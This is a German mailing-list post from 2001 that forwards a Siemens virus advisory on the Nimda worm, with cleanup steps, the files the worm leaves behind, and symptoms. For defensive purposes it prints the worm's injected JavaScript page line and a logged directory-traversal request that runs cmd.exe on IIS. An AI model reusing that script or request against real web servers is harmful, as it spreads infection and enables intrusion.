Title:
|
Hi Leute,
Ausnahmsweise mal eine HTML Mail von
mir.
Unser VCC hat es recht gut
beschrieben:
|
| Virusinformation zu Nimda [W32/Nimda.A@mm] |
| Name/Alias |
Nimda [W32/Nimda.A@mm] |
| Kurzbeschreibung |
Bereinigung des Virus (nicht
verifiziert):
NT-Server mit IIS
- Spielen Sie auf IIS die unter e MS00-078 und MS00-057 bereitgestellten
Hoitfixes ein
- Starten Sie den Server durch
- �berpr�fen Sie den Gast-Account und die
Gast-Gruppe. Falls aktiv: deaktivieren
- Scannen Sie das gesamte System mit ServerProtect
(Signatur 941). Erste Aktion:
CLEAN; zweite Aktion: DELETE! Alle Dateien scannen.
�berpr�fen Sie, ob alle Dateien gel�scht wurden.
- L�schen Sie in %WINDIR% die Dateien MEP*.TMP und
MEP*.TMP.EXE
- �berpr�fen Sie auf IIS-Maschinen die
Dateien
index.html
index.htm
index.asp
readme.html
readme.htm
readme.asp
main.html
main.htm
main.asp
default.html
default.htm
default.asp
auf
den Inhalt <html><script
language="JavaScript">window.open("readme.eml",
null,
"resizable=no,top=6000,left=6000")</script></html>.
Diese Zeile muss gel�scht werden.
- �berpr�fen Sie weiterhin die Real Time Scan
Results. Andere Maschinen werden versuchen, den Server
�ber das Dateisystem zu infizieren. Die Details der
Virenereignisse geben Ihnen Informationen zur
Auffindung der betroffenen Maschine (User
account).
NT_Workstation:
- Deaktiviren Sie ggfs. den Personal Webserver (PWS)
- Spielen Sie den ggfs den bei Microsoft verf�gbaren Patch
ein
- Starten Sie den Rechner neu
- �berpr�fen Sie den Gast-Account und die
Gast-Gruppe. Falls aktiv: deaktivieren
- Scannen Sie die komplette Maschine mit OfficeScan
(Signatur 941); �berpr�fen
Sie, ob der Virus in der zweiten Aktion
gel�scht/umbenannt/verschoben wurde
- L�schen Sie in %WINDIR% die Dateien MEP*.TMP und
MEP*.TMP.EXE
- �berpr�fen Sie auf PWS-Maschinen die
Dateien
index.html
index.htm
index.asp
readme.html
readme.htm
readme.asp
main.html
main.htm
main.asp
default.html
default.htm
default.asp
auf
den Inhalt <html><script
language="JavaScript">window.open("readme.eml",
null,
"resizable=no,top=6000,left=6000")</script></html>.
Diese Zeile muss gel�scht werden.
- Beenden des Virenprozesses: Im Task-Manager den
Prozess ME******tmp. beenden.
Tool CLEANNIMDA um verseuchte
Dateien zu l�schen. ACHTUNG: Die Bereinigung der
Registry ist nicht m�glich. Laufende Virenprozesse
werden nicht gestoppt. Bitte lassen Sie das Tool nach
einem Neustart ein zweites mal laufen, da offene Dateien
nicht gel�scht werden k�nnen.
Folgende Dateien werden vom Virus sicher erzeugt,
verseucht oder verwendet
| Dateiname |
Dateigr��e in Byte |
| *.EML |
79.225 |
| *.NWS |
79.225 |
| ADMIN.DLL |
57.344 |
| MMC.EXE |
57.344 |
| RICHED20.DLL |
57.344 |
| README.EXE |
57.344 |
| *.HTM* |
depends |
In *.HTM* Dateien f�gt der Virus ein oder zwei Zeilen
Java Script ein.
Innerhalb der Siemens AG ist der Wurm Nimda im
Umlauf. Der Virus kommt als README.EXE und greift
Internet Information Server an. Es gibt Hinweise
darauf, dass der Wurm erhebliche Schadensfunktionen
hat.
Symptome: schnelle Abfolge von Zugriffen auf Port 80.
Beispiel einer Logdatei:
Sep 18 16:04:23.332 bastion httpd[6086]: 121
Statistics: duration=0.00 id=7sI9f sent=97 rcvd=402
srcif=hme0 src="xxx.xxx.xxx.xxx/4929" dstif=hme1
dst=yyy.yyy.yyy.yyy/80 op=GET
arg=http://www/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
result="403 Forbidden" proto=http (request denied by
gwcontrol)
Das VCC hat eine verd�chtige Datei an die
AV-Hersteller geschickt. Name der Datei: ADMIN.DLL.
Neue Informationen werden in diesem Dokument
ver�ffentlicht (siehe Viren-Links). Bitte regelm.
�berpr�fen. |
| Eigenschaften |
Massen-Mailer, Schadens-Funktion
vorhanden |
| Virusarten |
Wurm |
| Erst-Information |
18.09.2001, aktualisiert am
19.09.2001 |
| Virenvorfall gemeldet |
18.09.2001 |
| VCC Risko-Bewertung |
|
| AV-Hersteller
Risko-Bewertung |
|
| Virus-Meldung |
 |
Bei Siemens aufgetreten |
| |
Unter VCC-Beobachtung |
 |
VCC-Vorsorge-Hinweis |
| |
AV-Hersteller-Warnung |
| |
VCC-Warnung |
| |
VCC-Notfall |
| |
In AV-Produkt-Lexikon |
| |
Virenmuster im VCC
vorhanden | |
| Anzahl betroffene
Bereiche: |
3 |
| Anzahl Meldungen: |
3 |
| Detail-Information: |
F-Secure
Symantec
Trend Micro
Heise-Verlag
(german)
|
| | |
SBS CISS VCC
Web-Seite
maschinell erstellt |
Server-Kopie -
kein
automatischer Update. |
Version:19.09.2001
Copyright 2001 SBS CISS
VCC |
| [aspdecoffeehouse] als
[email protected] subscribed
| http://www.aspgerman.com/archiv/aspdecoffeehouse/ = Listenarchiv
| Sie k�nnen sich unter folgender URL an- und abmelden:
| http://www.aspgerman.com/aspgerman/listen/anmelden/aspdecoffeehouse.asp
